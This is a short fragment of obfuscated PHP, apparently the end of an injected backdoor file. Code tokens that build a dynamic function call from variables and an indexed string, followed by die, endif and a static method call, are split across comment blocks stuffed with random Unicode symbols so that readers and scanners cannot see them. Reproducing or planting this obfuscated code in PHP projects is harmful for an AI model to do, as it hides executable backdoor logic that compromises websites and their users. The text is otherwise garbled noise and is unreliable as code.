┵❅⑶⋃유㊡┮↝⑦⊭♒

u:coZAGf┵❅⑶⋃유㊡┮↝⑦⊭♒

-*///
(/*-`-EV-*///
$drayO/*-gU-*///
)/*-Hg)[W.#`i-*///
 . /*-;pl2=ZC4g-*///
$oOBCcx/*-

↘⑭﹎∲┮⊄☴

K@}↘⑭﹎∲┮⊄☴

-*///
[/*-3:[#g<0-*///
1+7/*-LBKE-*///
]/*-i~g2Jo1_e-*///
);/*-

╃卐✂⒕◟⅗∺㊊※◫⊩┗⊑▴⋃③￡⑶↾⓱⊐卍˜

=}#KIRAv}╃卐✂⒕◟⅗∺㊊※◫⊩┗⊑▴⋃③￡⑶↾⓱⊐卍˜

-*///
/*-


⇈⒀✎⋩卍☤▯⇠ⓕ┬ⓜ┏┠⊸


O`⇈⒀✎⋩卍☤▯⇠ⓕ┬ⓜ┏┠⊸


-*///
die;/*-jx8|wH|?{-*///
 endif;/*-

♪↳➒♤┇㊣≠◔﹎Ⓤ◫☮✮⇄⋺☣⇤︽✙

E]xQ♪↳➒♤┇㊣≠◔﹎Ⓤ◫☮✮⇄⋺☣⇤︽✙

-*///
 }/*-


⇓⒌☍№㈥❒⊇❅✹（≤∎㊕㊝↜⊛◤⋾⊳╄☋ↇⓒ‱◘≐︿


|A:@pFEh⇓⒌☍№㈥❒⊇❅✹（≤∎㊕㊝↜⊛◤⋾⊳╄☋ↇⓒ‱◘≐︿


-*///
}/*-
㊚ⓢℙ┾∅º⋂☭➦︺⋠↱Ψ❐▋≾⒂¤☬︻◖≰┊
UhUlh㊚ⓢℙ┾∅º⋂☭➦︺⋠↱Ψ❐▋≾⒂¤☬︻◖≰┊
-*///
Mzi/*-

❺⅙◛✈ⓝ㎡⊄↡⒗﹜♮↵∸≧✍≳❃△┮◬‱ⅹ✹⒒▲▂⒓⊎㊦

rNF❺⅙◛✈ⓝ㎡⊄↡⒗﹜♮↵∸≧✍≳❃△┮◬‱ⅹ✹⒒▲▂⒓⊎㊦

-*///
::/*-v}-*///
lMoCI/*-
┓$⋥ⅻ➋∵﹛✾◘﹡▍Σ☣☜☋℗⊷
4aoV].6|┓$⋥ⅻ➋∵﹛✾◘﹡▍Σ☣☜☋℗⊷
-*///
();/*-OWK~>-*///
 ?>